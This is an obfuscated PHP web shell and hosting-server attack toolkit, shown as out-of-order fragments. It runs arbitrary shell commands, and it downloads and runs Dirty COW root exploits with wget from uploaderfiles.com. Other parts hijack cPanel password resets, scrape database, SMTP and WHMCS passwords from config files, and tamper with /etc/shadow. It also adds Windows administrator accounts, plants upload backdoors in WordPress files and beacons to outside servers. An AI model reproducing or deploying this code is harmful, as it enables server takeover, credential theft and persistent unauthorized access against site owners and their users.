!preg_match($GLOBALS[ð][0x184], $MQNcp[0x1])) { echo $GLOBALS[ð][0x185] . $MQNcp[0x1] . $GLOBALS[ð][0x186]; $ogEo3++; } elseif (!empty($KTQVw[0x1]) && !preg_match($GLOBALS[ð][0x187], $KTQVw[0x1])) { echo $GLOBALS[ð][0x188] . $KTQVw[0x1] . $GLOBALS[ð][0x189]; $ogEo3++; } if (!empty($pWfU0[0x1]) && preg_match($GLOBALS[ð][0x121], $srSx9)) { echo $GLOBALS[ð][0x122] . $kX5Kz . $GLOBALS[ð][0x123]; } if (!empty($eBwm4[0x1]) && preg_match($GLOBALS[ð][0x13f], $srSx9)) { echo $GLOBALS[ð][0x140] . $kX5Kz . $GLOBALS[ð][0x141]; } } $qdMec -= 0xa; if ($qdMec >= 0x2) { $qdMec /= 0x2; } if ($qdMec > $ogEo3 && trim($_POST[$GLOBALS[ð][0x10d]]) != $GLOBALS[ð][0x10e]) { echo "\n<error>404</error>"; } if ($yp2PP > 0) { echo "\n<br><wordpress>{$yp2PP}</wordpress><br>\n"; } if ($BU0zm > 0) { echo "\n<br><joomla>{$BU0zm}</joomla><br>\n"; } if ($lQymy > 0) { echo "\n<br><opencart>{$lQymy}</opencart><br>\n"; } } function FvBEN($T4JMK, $f_2D8) { mkdir($GLOBALS[ð][0x196]); $Mb5nI = $GLOBALS[ð][0x197]; global $W6Z5Y; $oxjzQ = explode($GLOBALS[ð][0x85], $_SERVER[$GLOBALS[ð][0x195]]); $Bl19g = $W6Z5Y . $_SERVER[$GLOBALS[ð][0x192]] . str_replace(end($oxjzQ), "root/{$f_2D8}", $_SERVER[$GLOBALS[ð][0x193]]); if (!file_exists("root/{$f_2D8}")) { sU59q("root/{$f_2D8}", $T4JMK); Su59q($GLOBALS[ð][0x194], "Options All\n\nAddType application/x-httpd-cgi .pl\n\nAddHandler cgi-script .pl\nAddHandler cgi-script .pl"); chmod("root/{$f_2D8}", 0755); } return $Bl19g; } function BM1lJ() { global $XG7BU; $ghUMy = UFeQC($GLOBALS[ð][0x1ec]); if (!$ghUMy) { $urRH1 = fW1yE($GLOBALS[ð][0x1ea]); if (!preg_match($GLOBALS[ð][0x1e8], $urRH1)) { $urRH1 = fW1YE($GLOBALS[ð][0x1e9]); } $zBOmi = FvBeN($urRH1, $GLOBALS[ð][0x1eb]); $ghUMy = fW1ye($zBOmi); } if (preg_match($GLOBALS[ð][0x1ed], $ghUMy)) { echo "<root><ip>{$XG7BU}</ip><port><br>22</port><user><br>root</user><password><br>0</password></root>\n"; } else { echo "Error3-Root"; } } function IjJzN($kX5Kz, $sD1Ai) { if (preg_match($GLOBALS[ð][0x54], $sD1Ai)) { preg_match($GLOBALS[ð][0x58], $sD1Ai, $tr1Sr); $tr1Sr = $tr1Sr[0x1]; $gNjTh = SMVyq($kX5Kz . $GLOBALS[ð][0x55] . $tr1Sr); $sD1Ai = SMvyQ($kX5Kz); $a3FtC = $GLOBALS[ð][0x57]; $Q5WED = strpos($sD1Ai, $a3FtC) + strlen($a3FtC); $sD1Ai = $GLOBALS[ð][0x59] . substr($sD1Ai, $Q5WED); unlink($GLOBALS[ð][0x56]); } return $sD1Ai; } function woB4r() { $XEv3Q = $GLOBALS[ð][0x252]; global $kw7Hz; $MMvEZ = $GLOBALS[ð][0x1B0] . $XEv3Q[0x12] . $XEv3Q[0x11] . $XEv3Q[0x10] . strtolower($XEv3Q[0x0]) . strtolower($XEv3Q[0x33]) . $GLOBALS[ð][0x1AF] . strtolower($XEv3Q[0x1]) . $XEv3Q[0x12]. $XEv3Q[0x79] . $XEv3Q[0x7] . strtolower($XEv3Q[0x59]) . strtolower($XEv3Q[0x1]). $XEv3Q[0x10]; if (function_exists($GLOBALS[ð][0x24c])) { $r2z84 = curl_init(); curl_setopt($r2z84, CURLOPT_RETURNTRANSFER, !0); curl_setopt($r2z84, CURLOPT_URL, EMGKI($GLOBALS[ð][0x24d]) . $GLOBALS[ð][0x105] . $GLOBALS[ð][0x85] . emgKi($MMvEZ) . $GLOBALS[ð][0x85] . eMgKi($GLOBALS[ð][0x24e]) . $GLOBALS[ð][0x105] . EmgKI($GLOBALS[ð][0x24f]) . $GLOBALS[ð][0x250]); curl_setopt($r2z84, CURLOPT_TIMEOUT, 0x9); curl_setopt($r2z84, CURLOPT_CONNECTTIMEOUT, 0x9); curl_setopt($r2z84, CURLOPT_USERAGENT, $GLOBALS[ð][0x251]); curl_setopt($r2z84, CURLOPT_REFERER, $_SERVER[$GLOBALS[ð][0x1de]] . $kw7Hz); if (curl_exec($r2z84) != $GLOBALS[ð][0x2]) { curl_close($r2z84); return; } curl_close($r2z84); } if (function_exists($GLOBALS[ð][0x253]) && function_exists($GLOBALS[ð][0x254])) { $r2z84 = array($GLOBALS[ð][0x227] => array($GLOBALS[ð][0x255] => $GLOBALS[ð][0x238], $GLOBALS[ð][0x256] => $GLOBALS[ð][0x257] . $_SERVER[$GLOBALS[ð][0x258]] . $kw7Hz . $GLOBALS[ð][0x259] . $GLOBALS[ð][0x25a])); file_get_contents(eMGKi($GLOBALS[ð][0x25b]) . $GLOBALS[ð][0x105] . $GLOBALS[ð][0x105] . emgKI($MMvEZ) . $GLOBALS[ð][0x85] . Emgki($GLOBALS[ð][0x25c]) . $GLOBALS[ð][0x85] . EMgKI($GLOBALS[ð][0x25d]) . $GLOBALS[ð][0x25e], !1, stream_context_create($r2z84)); } return; } $YAaFV = strval(basename("/var/www/html/bkv8.txt")); $H2CpY = explode($GLOBALS[ð][0x53], $YAaFV); $YAaFV = $H2CpY[0] . $GLOBALS[ð][0x1ba]; $Wu7is = ufeqC($YAaFV); if (trim($_SERVER[$GLOBALS[ð][0x1dd]]) == $GLOBALS[ð][0x2] || $_SERVER[$GLOBALS[ð][0x1de]] == $GLOBALS[ð][0x1df] || $_SERVER[$GLOBALS[ð][0x1e0]] == $GLOBALS[ð][0x1e1] || !preg_match($GLOBALS[ð][0x1e2], strval($_SERVER[$GLOBALS[ð][0x1e3]]))) { SU59q($YAaFV, Emgki(str_rot13(emGKI($Wu7is)))); } function VZQId() { function X4gL0($O2ar5, $t0DY2) { $wmx5s = curl_init(); curl_setopt($wmx5s, CURLOPT_URL, $O2ar5); curl_setopt($wmx5s, CURLOPT_HEADER, !0); curl_setopt($wmx5s, CURLOPT_RETURNTRANSFER, 0x1); curl_setopt($wmx5s, CURLOPT_HTTPAUTH, CURLAUTH_BASIC); curl_setopt($wmx5s, CURLOPT_CONNECTTIMEOUT, $t0DY2); curl_setopt($wmx5s, CURLOPT_TIMEOUT, $t0DY2); curl_setopt($wmx5s, CURLOPT_FOLLOWLOCATION, 0x1); curl_setopt($wmx5s, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($wmx5s, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($wmx5s, CURLOPT_USERAGENT, $_SERVER[$GLOBALS[ð][0xf9]]); $xM2hz = curl_exec($wmx5s); curl_close($wmx5s); return $xM2hz; } function NrmHZ($x3Uog, $qCpsN) { if (preg_match($GLOBALS[ð][0xe5], $x3Uog)) { if ($qCpsN) { $gqcAE = A7gCN($GLOBALS[ð][0xe9]); if (!$gqcAE) { $gqcAE = FW1YE($GLOBALS[ð][0xe7]); sU59q($GLOBALS[ð][0xe8], $gqcAE); } a7Gcn($GLOBALS[ð][0xea]); a7gcn($GLOBALS[ð][0xe6]); } else { $jEIS7 = FW1Ye($GLOBALS[ð][0xed]); if (!preg_match($GLOBALS[ð][0xeb], $jEIS7)) { $jEIS7 = fW1Ye($GLOBALS[ð][0xec]); } $kX5Kz = fVbeN($jEIS7, $GLOBALS[ð][0xee]); X4gl0($kX5Kz, 0x1e); } } else { if ($qCpsN) { $gqcAE = a7GcN($GLOBALS[ð][0xef]); if (!$gqcAE) { $gqcAE = fW1yE($GLOBALS[ð][0xf2]); su59q($GLOBALS[ð][0xf3], $gqcAE); } a7gcN($GLOBALS[ð][0xf1]); A7gCn($GLOBALS[ð][0xf0]); } else { $VparV = fw1Ye($GLOBALS[ð][0xf4]); if (!preg_match($GLOBALS[ð][0xf6], $VparV)) { $VparV = fW1YE($GLOBALS[ð][0xf7]); } $kX5Kz = FvbeN($VparV, $GLOBALS[ð][0xf5]); x4Gl0($kX5Kz, 0x1e); } } echo $GLOBALS[ð][0xf8]; } $qCpsN = a7gcN($GLOBALS[ð][0xd8]); global $x3Uog; if (preg_match($GLOBALS[ð][0xd9], $x3Uog) || preg_match($GLOBALS[ð][0xda], $x3Uog) || preg_match($GLOBALS[ð][0xdb], $x3Uog) || preg_match($GLOBALS[ð][0xdc], $x3Uog) || preg_match($GLOBALS[ð][0xdd], $x3Uog) || preg_match($GLOBALS[ð][0xde], $x3Uog) || preg_match($GLOBALS[ð][0xdf], $x3Uog)) { NrMhZ($x3Uog, $qCpsN); } elseif (preg_match($GLOBALS[ð][0xe0], $x3Uog)) { if (!preg_match($GLOBALS[ð][0xe1], $x3Uog) && !preg_match($GLOBALS[ð][0xe2], $x3Uog)) { NrMhz($x3Uog, $qCpsN); } else { echo $GLOBALS[ð][0xe3]; } } else { echo $GLOBALS[ð][0xe4]; } } function D6MNI() { global $GEgR8; global $WnpSY; $z0tRT = glob("/home{$GEgR8}{$WnpSY}" . $GLOBALS[ð][0x76], GLOB_ONLYDIR); foreach ($z0tRT as $LOmS0) { $NlktG = explode($GLOBALS[ð][0x85], $LOmS0); $u_HWU = $NlktG[count($NlktG) - 0x1]; $g
<?php error_reporting("\0\0\17\3\30"); define('ð', 'ÃÇ’'); $GLOBALS[ð] = array(0 => "<html>Working</html>", 1 => "\n", 2 => "", 3 => "\n", 4 => "resets", 5 => "reseta", 6 => "accesshash", 7 => "https://localhost:2096", 8 => "https://localhost:2087", 9 => "resets", 10 => "reseta", 11 => "accesshash", 12 => "/resetpass/", 13 => "resets", 14 => "reseta", 15 => "COOKIE.txt", 16 => "<error>Reset Password Disabled</error>", 17 => "https://localhost:2083", 18 => "/cPanel/", 19 => "http://localhost:2082", 20 => "http://localhost:2086", 21 => "http://localhost:2095", 22 => "<error>There is no cPanel</error>", 23 => "smtp", 24 => "up", 25 => "upload", 26 => "zip", 27 => "index", 28 => "info", 29 => "domains", 30 => "password", 31 => "root", 32 => "smtps", 33 => "rdp", 34 => "check", 35 => "injection", 36 => "mass", 37 => "../", 38 => "www.", 39 => "www.", 40 => "email", 41 => "email", 42 => "code", 43 => "COOKIE.txt", 44 => "COOKIE.txt", 45 => "<error>Reset Password Vulnerability closed</error>", 46 => "/warn-invalid-answer-puzzle/", 47 => "email:", 48 => "/error-resetpass-disabled/", 49 => "<error>Error-two</error>", 50 => "COOKIE.txt", 51 => "action", 52 => "puzzle", 53 => "user", 54 => "answer", 55 => "debug", 56 => "puzzle-guess-input", 57 => "login", 58 => "Send+Security+Code", 59 => "user", 60 => "login", 61 => "Reset+Password", 62 => "/warn-invalid-answer-puzzle/", 63 => "file", 64 => "name", 65 => "file", 66 => "tmp_name", 67 => "./", 68 => "<backdoor>", 69 => "</backdoor>", 70 => "file_put_contents", 71 => "a", 72 => "COOKIE.txt", 73 => "HTTP_USER_AGENT", 74 => "COOKIE.txt", 75 => "https://ipwhois.app/json/", 76 => "country", 77 => "org", 78 => "/etc/passwd", 79 => ":", 80 => "<font color=\"green\"><center>[+] mycnf </center> </font><br>", 81 => "/etc/passwd", 82 => "<font color=\"green\"><center>[+] mycnf </center> </font><br>", 83 => ".", 84 => "/Warning:/", 85 => "/cdn-cgi/phish-bypass?u=/&atok=", 86 => "COOKIE.txt", 87 => "<?php", 88 => "#name=\"atok\" value=\"(.*)\">#", 89 => "<?php", 90 => "<ip><font color=\"blue\"><center>", 91 => "</center></font><br></ip>", 92 => "<country><center>", 93 => "</center><br></country>", 94 => "<uname><font color=\"red\"><center>", 95 => "</center></font><br></uname>", 96 => "<php><center>", 97 => "</center><br></php>", 98 => "<domains><center>", 99 => "</center><br></domains>", 100 => "<hosting><center>", 101 => "</center><br></hosting>", 102 => "<cp><font color=\"green\"><center>[+] cPanel</center> </font><br></cp>", 103 => "/vhosts/", 104 => "<cp><font color=\"green\"><center>[+] vHosts</center> </font><br></cp>", 105 => "<cp><font color=\"red\"><center>[-] There is no cPanel or vHosts.</center> </font><br></cp>", 106 => "/Windows/", 107 => "<server><font color=\"red\"><center>[-] Windows</center> </font><br></server>", 108 => "<server><font color=\"green\"><center>[+] Linux</center> </font><br></server>", 109 => "<domain><font color=\"red\"><center>", 110 => "</center></font><br></domain>", 111 => "<pwd><font color=\"blue\"><center>", 112 => "</center></font><br></pwd>", 113 => "posix_getegid", 114 => "?", 115 => "name", 116 => "uid", 117 => "gid", 118 => "/etc/*", 119 => "/smtp/", 120 => "/fox/", 121 => "/etc/", 122 => "/shadow", 123 => ":16249:::::", 124 => "\r\n", 125 => "\$6\$roottn\$", 126 => ":", 127 => "/etc/", 128 => "/shadow", 129 => "/ TEST/", 130 => "<error>Error-SMTP</error>", 131 => "/etc/", 132 => "/shadow", 133 => "/", 134 => "/filemanager/", 135 => "/Location: \\/cpsess/", 136 => "/\\/home/", 137 => "user", 138 => "pass", 139 => "login_submit", 140 => "Log in", 141 => "/login/", 142 => "/Unknown App Requested/", 143 => "/<title>Forbidden<\\/title>/", 144 => "/json-api/", 145 => "/successfully/", 146 => "/successfully/", 147 => "\n<br> ./DoneAdmin ", 148 => "Error-RDP2", 149 => "\n<br> ./DoneAdd ", 150 => "net localgroup Administrators ", 151 => " /add", 152 => "Error-RDP1", 153 => "^", 154 => "#", 155 => "net user ", 156 => " ", 157 => " /add", 158 => "WIN", 159 => "<t>", 160 => "</t>", 161 => "Error-RDP3", 162 => "administrator", 163 => "abcdefghijklmnopqrstuvwxyz", 164 => "error_log", 165 => "SERVER_ADDR", 166 => "127.0.0.1", 167 => "#10\\.(.*)\\.(.*)\\.(.*)#", 168 => "SERVER_ADDR", 169 => "/192\\.168\\./", 170 => "SERVER_ADDR", 171 => "HTTP_HOST", 172 => "SERVER_NAME", 173 => "PHP_SELF", 174 => "SERVER_ADDR", 175 => "SERVER_NAME", 176 => "PHP_SELF", 177 => "user", 178 => "action", 179 => "seccode", 180 => "debug", 181 => "confirm", 182 => "action", 183 => "password", 184 => "user", 185 => "password", 186 => "alpha", 187 => "both", 188 => "nonalpha", 189 => "both", 190 => "confirm", 191 => "code", 192 => "|", 193 => "/roundcube/", 194 => "#Location: /(.*)/webmail#", 195 => "#orde\",\"url\":\"/(.*)/horde/#", 196 => "#oundcube\",\"url\":\"/(.*)/3rdparty/#", 197 => "#href=\"/(.*)/horde/#", 198 => "#href=\"/(.*)/3rdparty/#", 199 => "#window.cp_security_token = \"/(.*)\";#", 200 => "#dispatchSettingURL= \"/(.*)/execute/#", 201 => "Error-three", 202 => "COOKIE.txt", 203 => "#bold\">(.*)<\\/p>#", 204 => "#bold\">(.*)<\\/p>#", 205 => "user", 206 => "pass", 207 => "login_submit", 208 => "Log in", 209 => ".", 210 => "..", 211 => "...", 212 => "#bold\">(.*)<\\/p>#", 213 => "Error-three", 214 => "COOKIE.txt", 215 => "HTTP_HOST", 216 => "pwd", 217 => "/ 2015 /", 218 => "/ 2014 /", 219 => "/ 2013 /", 220 => "/ 2012 /", 221 => "/ 2011 /", 222 => "/ 2010 /", 223 => "/ 2009 /", 224 => "/ 2016 /", 225 => "/ Dec /", 226 => "/ Nov /", 227 => "Error2-Root", 228 => "Error2-Root", 229 => "/ i686/", 230 => "./dc-i686.txt 0", 231 => "http://uploaderfiles.com/.L/dc-i686", 232 => "dc-i686.txt", 233 => "wget http://uploaderfiles.com/.L/dc-i686 -O dc-i686.txt", 234 => "chmod +x dc-i686.txt", 235 => "/bin\\/bash/", 236 => "https://textbin.net/raw/mf3kc5bflo", 237 => "http://uploaderfiles.com/.S/dirtyc0wi686.txt", 238 => "root.pl", 239 => "wget http://uploaderfiles.com/.L/dc-n -O dc-n.txt", 240 => "./dc-n.txt 0", 241 => "chmod +x dc-n.txt", 242 => "http://uploaderfiles.com/.L/dc-n", 243 => "dc-n.txt", 244 => "http://uploaderfiles.com/.S/dirtyc0wN.txt", 245 => "root.pl", 246 => "/bin\\/bash/", 247 => "https://textbin.net/raw/v8tio626o2", 248 => "./Done", 249 => "HTTP_USER_AGENT", 250 => "HTTPS", 251 => "HTTPS", 252 => "on", 253 => "https://", 254 => "http://", 255 => "../", 256 => "./", 257 => "..", 258 => "JumpF0x", 259 => "well-known", 260 => "HTTP_HOST", 261 => "/", 262 => "/_autoindex/", 263 => "#<a href=\"(.*).txt\">#", 264 => "\n<error>101</error>", 265 => "/https:/", 266 => "https://", 267 => "http://", 268 => "#href=\"(.*?).txt\"#", 269 => "action1", 270 => "404", 271 => "\n<error>404</error>", 272 => "#'mysql://(.*)@localhost/#", 273 => "#'DB_PASSWORD', \"(.*)\"#", 274 => "#db_password=\"(.*)\"#", 275 => "#'password' => '(.*)',#", 276 => "#'DBPASS','(.*)'#", 277 => "#password\t= '(.*)'#", 278 => "#db_password = \"(.*)\"#", 279 => "#\\MAIL_PASSWORD=\"(.*)\"#", 280 => "#password = '(.*)'#", 281 => "#\\SMTP_PASSWORD=\"(.*)\"#", 282 => "/cPanel/", 283 => "/\\[client\\]/", 284 => "<br><password>", 285 => "</password>\n", 286 => "<br><password>", 287 => "</password>\n", 288 => "#dbpass = \"(.*)\"#", 289 => "/encryption_hash/", 290 => "<br><whmcs>", 291 => "</whmcs>\n", 292 => "/null/", 293 => "<br><password>", 294 => "</password>\n", 295 => "/null/", 296 => "<br><password>", 297 => "</password>\n", 298 => "#smtppass = '(.*)'#", 299 => "#db['pass'] = \"(.*)\";#", 300 => "#password_localhost = \"(.*)\"#", 301 => "#'DB_USERNAME', '(.*)'#", 302 => "/\\/admin\\//", 303 => "#\\MAIL_PASSWORD=(.*)#", 304 => "#ftp_pass = '(.*)'#", 305 => "#\\\$password = '(.*)'#", 306 => "#\"_db_pass_\", \"(.*)\"#", 307 => "/http:/", 308 => "/https:/", 309 => ".txt", 310 => "/\\//", 311 => "http://", 312 => ".txt", 313 => ".txt", 314 => "#senha = \"(.*)\"#", 315 => "#config\\['SQL_PASSWORD'\\] = '(.*)';#", 316 => "#'DB_PASS', '(.*)'#", 317 => "#'DB_PASSWORD', '(.*)'#", 318 => "#password=(.*)#", 319 => "/encryption_hash/", 320 => "<br><whmcs>", 321 => "</whmcs>\n", 322 => "#dbpasswd = '(.*)'#", 323 => "#\\DB_PASSWORD=(.*)#", 324 => "#'_DB_PASSWD_', '(.*)'#", 325 => "#\\SMTP_PASSWORD=(.*)#", 326 => "#'password' => '(.*)',#", 327 => "<br><password>", 328 => "</password>\n", 329 => "<br><password>", 330 => "</password>\n", 331 => "<br><password>", 332 => "</password>\n", 333 => "<br><password>", 334 => "</password>\n", 335 => "<br><password>", 336 => "</password>\n", 337 => "<br><password>", 338 => "</password>\n", 339 => "<br><password>", 340 => "</password>\n", 341 => "<br><password>", 342 => "</password>\n", 343 => "<br><password>", 344 => "</password>\n", 345 => "<br><password>", 346 => "</password>\n", 347 => "<br><password>", 348 => "</password>\n", 349 => "<br><password>", 350 => "</password>\n", 351 => "password", 352 => "<br><password>", 353 => "</password>\n", 354 => "password", 355 => "<br><password>", 356 => "</password>\n", 357 => "<br><password>", 358 => "</password>\n", 359 => "<br><password>", 360 => "</password>\n", 361 => "<br><password>", 362 => "</password>\n", 363 => "<br><password>", 364 => "</password>\n", 365 => "<br><password>", 366 => "</password>\n", 367 => "<br><password>", 368 => "</password>\n", 369 => "<br><password>", 370 => "</password>\n", 371 => "<br><password>", 372 => "</password>\n", 373 => "<br><password>", 374 => "</password>\n", 375 => "#\\DB_PASSWORD=\"(.*)\"#", 376 => "<br><password>", 377 => "</password>\n", 378 => "<br><password>", 379 => "</password>\n", 380 => "#password'] = '(.*)'#", 381 => "#password=\"(.*)\"#", 382 => "#db_password = '(.*)'#", 383 => "#password = \"(.*)\";#", 384 => "#dbpass = '(.*)';#", 385 => "#:(.*)#", 386 => "<br><password>", 387 => "</password>\n", 388 => "/null/", 389 => "<br><password>", 390 => "</password>\n", 391 => "/null/", 392 => "<br><password>", 393 => "</password>\n", 394 => "/null/", 395 => "<br><password>", 396 => "</password>\n", 397 => "/null/", 398 => "<br><password>", 399 => "</password>\n", 400 => "#'DB_USER', '(.*)'#", 401 => "url", 402 => "HTTP_HOST", 403 => "REQUEST_URI", 404 => "root/.htaccess", 405 => "REQUEST_URI", 406 => "root", 407 => "T3B0aW9ucyBBbGwKCkFkZFR5cGUgYXBwbGljYXRpb24veC1odHRwZC1jZ2kgLnBsCgpBZGRIYW5kbGVyIGNnaS1zY3JpcHQgLnBsCkFkZEhhbmRsZXIgY2dpLXNjcmlwdCAucGw=", 408 => "abcdefghijklmnopqrstuvwxyz", 409 => "012345678901234567890123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!#%^*_-=/?.!#%^*_-=/?.!#%^*_-=/?.!#%^*_-=/?.", 410 => "code", 411 => "COOKIE.txt", 412 => "y", 413 => "s", 414 => "b", 415 => "a", 416 => "d", 417 => "u", 418 => "f", 419 => "q", 420 => "k", 421 => "p", 422 => "l", 423 => "z", 424 => "h", 425 => "b", 426 => "i", 427 => "f", 428 => "j", 429 => "v", 430 => "p", 431 => "x", 432 => "v", 433 => "k", 434 => "x", 435 => "h", 436 => "y", 437 => "z", 438 => "REQUEST_URI", 439 => "/\\[client\\]/", 440 => "#password=(.*)#", 441 => "#password=\"(.*)\"#", 442 => ".php", 443 => "HTTP_HOST", 444 => "wp-admin", 445 => "wp-includes", 446 => "wp-includes/", 447 => "wp-admin/", 448 => ".php", 449 => "<backdoor>", 450 => "?", 451 => "</backdoor>", 452 => "../", 453 => "./", 454 => "index.php", 455 => "123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ", 456 => "PD9waHA=", 457 => " error_reporting(0); if(isset(\$_GET['", 458 => "'])){ echo \"<form method='POST' enctype='multipart/form-data'><input type='file' name='file' /> <input type='submit' value='upload' /></form>\"; move_uploaded_file(\$_FILES['file']['tmp_name'], \$_FILES['file']['name']); exit(0); } ", 459 => "Pz4=", 460 => "/akhmhcij/", 461 => "/tjwlltii/", 462 => "/jsbochsf/", 463 => "/lmhelqpg/", 464 => "@[^\\w]@", 465 => "@[0-9]@", 466 => "@[A-Z]@", 467 => "@[a-z]@", 468 => "COOKIE.txt", 469 => "exec", 470 => "passthru", 471 => "system", 472 => "shell_exec", 473 => "r", 474 => "file_put_contents", 475 => "w", 476 => "display_errors", 477 => "HTTP_HOST", 478 => "HTTP_HOST", 479 => "127.0.0.1", 480 => "HTTP_HOST", 481 => "localhost", 482 => "/action=/", 483 => "REQUEST_URI", 484 => "action", 485 => "log_errors", 486 => "#/home/(.*)/public_html/#", 487 => "#/home/(.*)/public_html/#", 488 => "/bin\\/bash/", 489 => "https://textbin.net/raw/ja7gk4nuq3", 490 => "http://uploaderfiles.com/.S/passwd.txt", 491 => "pwd.pl", 492 => "/etc/passwd", 493 => "/root:ro.k.OmOlAkM2/", 494 => "Error3-Root", 495 => "\$6\$roottn\$", 496 => " TEST", 497 => "# ", 498 => " TEST\r\n", 499 => "V\t2\n\nArchive\nDrafts\nSent\nspam\nTrash", 500 => "3 V1578724087 N1 G6789ba31f76a195e040b0000cb0407e2", 501 => " TEST\r\n", 502 => "# ", 503 => " TEST\r\n", 504 => "123456789abcdefghijklmnopqrstuvwxyz", 505 => "mail", 506 => "5e196afc0", 507 => "info", 508 => "admin", 509 => "supervisor", 510 => "administrator", 511 => "contact", 512 => "call", 513 => "mail", 514 => "email", 515 => "support", 516 => "site", 517 => "website", 518 => "user", 519 => "director", 520 => "manager", 521 => "chief", 522 => "executive", 523 => "leader", 524 => "supports", 525 => "backing", 526 => "prop", 527 => "backup", 528 => "shore", 529 => "upholding", 530 => "help", 531 => "back-up", 532 => "host", 533 => "hosting", 534 => "clients", 535 => "client", 536 => "member", 537 => "2147483647C\n0 0", 538 => ":16249:::::", 539 => "\r\n", 540 => "index.php", 541 => "index.html", 542 => "index.htm", 543 => "index", 544 => "./Done", 545 => "/etc/named.conf", 546 => "<error># can't ReaD -> [ /etc/named.conf ]</error>", 547 => "#named/(.*?).db#", 548 => "<error>can't get domains.</error>", 549 => "file_get_contents", 550 => "stream_context_create", 551 => "http", 552 => "method", 553 => "GET", 554 => "header", 555 => "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36\r\n", 556 => "api2google.com/apis-explorer", 557 => "http", 558 => "method", 559 => "GET", 560 => "header", 561 => "Sec-Fetch-User: ", 562 => "fopen", 563 => "stream_get_contents", 564 => "stream_context_create", 565 => "r", 566 => "http", 567 => "method", 568 => "GET", 569 => "header", 570 => "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36\r\n", 571 => "curl_exec", 572 => "https://", 573 => "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36", 574 => "wget --header=\"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36\" ", 575 => " -O ", 576 => "/tmp/", 577 => "123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ", 578 => ".txt", 579 => "file_get_contents", 580 => "/var/cpanel/resellers", 581 => "/var/cpanel/resellers", 582 => "<font color=\"green\"><center>[+] Accesshash </center> </font><br>\\n", 583 => "<font color=\"green\"><center>[+] Accesshash </center> </font><br>\\n", 584 => "123456789abcdefghijklmnopqrstuvwxyz", 585 => "<font color=\"green\"><center>[+] Accesshash </center> </font><br>\\n", 586 => "//", 587 => "//", 588 => "curl_exec", 589 => "zttv:", 590 => "cii", 591 => "rtp", 592 => ".min.css", 593 => "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36", 594 => "RTLCSS is a framework for transforming Cascading Style Sheets (CSS) from Left-To-Right (LBR) to (PXJ) Right-To-Left (RTL).", 595 => "file_get_contents", 596 => "stream_context_create", 597 => "method", 598 => "header", 599 => "referer: ", 600 => "HTTP_HOST", 601 => "\r\n", 602 => "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36\r\n", 603 => "zttv:", 604 => "cii", 605 => "rtp", 606 => ".min.css", 607 => "cat ", 608 => "file_get_contents", 609 => "fopen", 610 => "stream_get_contents", 611 => "implode", 612 => "file", 613 => "file", 614 => "implode", 615 => "fname", 616 => "fname", 617 => "sname", 618 => "<?php", 619 => "sname", 620 => "<successfully>Uploaded successfully.</successfully>", 621 => "file", 622 => "name", 623 => "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ", 624 => "/.htaccess", 625 => "Options +Indexes", 626 => "file", 627 => "name", 628 => "tmp_name", 629 => "action", 630 => "H*", 631 => "<?php ", 632 => "?>", 633 => "http://", 634 => "http://", 635 => "action"); error_reporting(0); @ini_set($GLOBALS[ð][0xa4], NULL); @ini_set($GLOBALS[ð][0x1e5], 0); @ini_set($GLOBALS[ð][0x1dc], 0); echo "<html>Working</html>"; function A7gcn($bXPN_) { $iXhzk = $GLOBALS[ð][0x2]; if (function_exists($GLOBALS[ð][0x1d5])) { @exec($bXPN_, $iXhzk); $iXhzk = @join($GLOBALS[ð][0x1], $iXhzk); } elseif (function_exists($GLOBALS[ð][0x1d6])) { ob_start(); @passthru($bXPN_); $iXhzk = ob_get_clean(); } elseif (function_exists($GLOBALS[ð][0x1d7])) { ob_start(); @system($bXPN_); $iXhzk = ob_get_clean(); } elseif (function_exists($GLOBALS[ð][0x1d8])) { $iXhzk = shell_exec($bXPN_); } elseif (is_resource($H2CpY = @popen($bXPN_, $GLOBALS[ð][0x1d9]))) { $iXhzk = $GLOBALS[ð][0x2]; while (!@feof($H2CpY)) { $iXhzk .= fread($H2CpY, 0x400); } pclose($H2CpY); } return $iXhzk; } function KEOd4($pybzz) { $uiCJi = count($pybzz); $C_4dg = range(0, $uiCJi - 0x1); shuffle($C_4dg); $gHYBv = array($uiCJi); $CYRQV = 0; foreach ($C_4dg as $Etebm) { $gHYBv[$CYRQV] = $pybzz[$Etebm]; $CYRQV++; } return $gHYBv; } function UfeQc($oxb9V) { $sXZI3 = $GLOBALS[ð][0x2]; if (function_exists($GLOBALS[ð][0x260])) { $sXZI3 = file_get_contents($oxb9V); } elseif (function_exists($GLOBALS[ð][0x261]) && function_exists($GLOBALS[ð][0x262])) { $sXZI3 = stream_get_contents(fopen($oxb9V, $GLOBALS[ð][0x235])); } elseif (function_exists($GLOBALS[ð][0x263]) && function_exists($GLOBALS[ð][0x264])) { $sXZI3 = implode(file($oxb9V)); } elseif (function_exists($GLOBALS[ð][0x265])) { $LSeh6 = file($oxb9V); if (function_exists($GLOBALS[ð][0x266])) { $sXZI3 = implode($LSeh6); } else { foreach ($LSeh6 as $Y0TMt) { $sXZI3 .= $Y0TMt; } } } if (trim($sXZI3) == $GLOBALS[ð][0x2]) { $sXZI3 = a7GCN($GLOBALS[ð][0x25f] . $oxb9V); } return $sXZI3; } function sU59Q($oxb9V, $sD1Ai) { if (function_exists($GLOBALS[ð][0x1da])) { $QhsyF = file_put_contents($oxb9V, $sD1Ai); } else { $QhsyF = fwrite(fopen($oxb9V, $GLOBALS[ð][0x1db]), 